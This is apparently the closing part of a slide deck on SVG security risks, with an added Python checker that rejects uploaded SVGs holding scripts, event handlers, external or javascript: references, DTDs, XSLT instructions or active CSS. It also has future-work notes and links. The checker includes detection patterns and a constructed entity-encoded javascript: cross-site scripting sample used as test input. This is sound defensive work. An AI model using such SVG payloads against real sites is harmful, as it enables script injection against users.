●   SVG can embed, link or reference any kind of content over cross domain borders
●   SVG provides new ways of payload obfuscation
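A server-side upload check in the spirit of this slide, added here as an example; it is not code from the talk and not the SVG Purifier announced on the next slide. It treats an SVG as markup rather than as an image and fails closed on each construct the earlier slides turn into a vector: script and handler elements (slides 10, 11), event attributes and animation elements that set them (slide 11), javascript: and every other non-local reference, checked after entity decoding (slides 11, 20), XSLT processing instructions and DTDs (slides 19, 24), markup reaching <style> through entities (slide 23), and anything a strict XML parser cannot fully inspect (slide 22). The rule sets, the finding strings and the sample documents are my own construction, built on the standard library's expat binding only.

```python
"""Server-side check for uploaded SVG files.

Added example; not code from the talk or from the SVGPurifier project.
Policy: an SVG is markup, not an image. Anything that can run, load or
reference something is reported, and the caller rejects the upload.
"""
import re
import xml.parsers.expat as expat

SVG_NS = "http://www.w3.org/2000/svg"

# Element local names that run or load active content. Matched in any namespace,
# so an XHTML <script>/<iframe> inside <foreignObject> and an XSL <stylesheet>
# are caught as well as the SVG elements from slides 10 and 11.
ACTIVE_ELEMENTS = {"script", "handler", "listener", "foreignobject", "iframe",
                   "object", "embed", "applet", "stylesheet"}

# Animation elements can rewrite another attribute at run time
# (slide 11: <set attributeName="onmouseover" to="alert(1)"/>).
ANIMATION_ELEMENTS = {"set", "animate", "animatemotion", "animatetransform",
                      "animatecolor", "animation"}

# CSS that loads, links or executes, plus a literal '<' inside <style>: entity
# decoding turns &lt;img ...&gt; into that, which slide 23 shows becoming elements.
CSS_ACTIVE = re.compile(r"(?i)(url\s*\(|@import|expression\s*\(|-o-link|javascript:|<)")


class _Abort(Exception):
    """Stop parsing at a construct that must not be processed any further."""


def _split(name):
    """expat hands names as 'namespace localname'; return (namespace, localname)."""
    ns, _, local = name.rpartition(" ")
    return ns, local


def check_svg(data):
    """Return the list of findings for an SVG document (bytes); empty means clean.

    A parse error is itself a finding: what a strict XML parser rejects may still
    be interpreted by a tolerant HTML parser (slides 22 and 23), so nothing is
    accepted that the strict parser could not fully inspect.
    """
    findings = []
    state = {"root_seen": False, "style_depth": 0}
    parser = expat.ParserCreate(namespace_separator=" ")
    parser.buffer_text = True  # deliver each text run to the handler in one piece

    def on_doctype(name, sysid, pubid, has_internal_subset):
        # A DTD is where external entities and entity bombs live (slide 24);
        # stop before any entity can be expanded.
        findings.append("DOCTYPE present")
        raise _Abort

    def on_pi(target, value):
        # <?xml-stylesheet?> attaches XSLT, which can emit arbitrary XHTML (slide 19).
        findings.append("processing instruction <?%s?>" % target)
        raise _Abort

    def on_start(name, attrs):
        ns, local = _split(name)
        tag = local.lower()
        if not state["root_seen"]:
            state["root_seen"] = True
            if (ns, tag) != (SVG_NS, "svg"):
                findings.append("root element is not <svg> in the SVG namespace")
        if tag in ACTIVE_ELEMENTS:
            findings.append("active element <%s>" % local)
        if tag == "style":
            state["style_depth"] += 1
        for aname, value in attrs.items():
            attr = _split(aname)[1].lower()
            if attr.startswith("on"):
                findings.append("event handler %s on <%s>" % (attr, local))
            elif attr == "href" and not value.strip().startswith("#"):
                # Only same-document references pass; this drops javascript:, data:
                # and every cross-domain reference (slide 26) in one rule. expat has
                # already decoded character references, so &#106;avascript: arrives
                # here as javascript:.
                findings.append("external reference %s=%r on <%s>" % (attr, value, local))
            elif attr == "style" and CSS_ACTIVE.search(value):
                findings.append("active CSS in style attribute on <%s>" % local)
            elif tag in ANIMATION_ELEMENTS and attr == "attributename":
                target = value.strip().lower()
                if target.startswith("on") or target.endswith("href"):
                    findings.append("<%s> retargets attribute %s" % (local, value))

    def on_end(name):
        if _split(name)[1].lower() == "style":
            state["style_depth"] -= 1

    def on_text(text):
        if state["style_depth"] and CSS_ACTIVE.search(text):
            findings.append("active CSS or markup inside <style>")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.ProcessingInstructionHandler = on_pi
    parser.StartElementHandler = on_start
    parser.EndElementHandler = on_end
    parser.CharacterDataHandler = on_text
    try:
        parser.Parse(data, True)
    except _Abort:
        pass
    except expat.ExpatError as err:
        findings.append("not well-formed XML: %s" % err)
    return findings


# Constructed samples (not from the talk) exercising the rules above.
CLEAN = b'<svg xmlns="http://www.w3.org/2000/svg"><circle r="40" fill="red"/></svg>'
ENCODED_HREF = (b'<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">'
                b'<a xlink:href="&#106;avascript:alert(1)"><text>click</text></a></svg>')

if __name__ == "__main__":
    for sample in (CLEAN, ENCODED_HREF):
        print(check_svg(sample) or "clean")
```

A file that passes this check is still an application the moment it is opened directly (slide 15), so for uploads the clean result is the precondition for rasterising the SVG to a bitmap or for storing it without serving it as an inline image, not a reason to start treating the file as a picture.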
27. Future Work
●   SVG Purifier
    ●   Based on HTMLPurifier 4.3.0
    ●   Still very young
    ●   Smoke-test has been published http://heideri.ch/svgpurifier
●   More articles on the HTML5 Sec Cheatsheet Wiki
●   Publications, to raise awareness
    ●   Crouching Tiger – Hidden Payload, submission CCS 2011
●   More demo vectors on the H5SC to demonstrate impact
●   OWASP research and documentation?
28. Links
●   Wikipedia on SVG http://en.wikipedia.org/wiki/Scalable_Vector_Graphics
●   W3C SVG Working Group http://www.w3.org/Graphics/SVG/
●   SVG Full 1.1 (W3C) http://www.w3.org/TR/SVG11/
●   SVG Basic 1.1 and SVG Tiny 1.2 http://www.w3.org/TR/SVGMobile/
●   SVG 2.0 http://dev.w3.org/SVG/profiles/2.0/publish/intro.html
●   Adobe's SVG Zone (for archaeologists) http://www.adobe.com/svg/
●   H5SC http://html5sec.org/
●   XSLT and SVG http://scarybeastsecurity.blogspot.com/20...riousity.html
●   Opera SVG Bug http://heideri.ch/opera/
●   HTMLPurifier http://htmlpurifier.org/
●   JSBin http://jsbin.com/
●   SVGPurifier Smoke-Test http://heideri.ch/svgpurifier
●   More SVG fun http://maliciousmarkup.blogspot.com/20...re-xml-fun.html
29. Thanks
●   Thanks for listening!
●   Questions or Comments?
●   Discussion and tool preview?
●   Thanks to
    ●   Gareth Heyes and Manuel Caballero from UNH
    ●   Alexey Silin / LeverOne
    ●   Erik of Opera
    ●   Dave Ross of Microsoft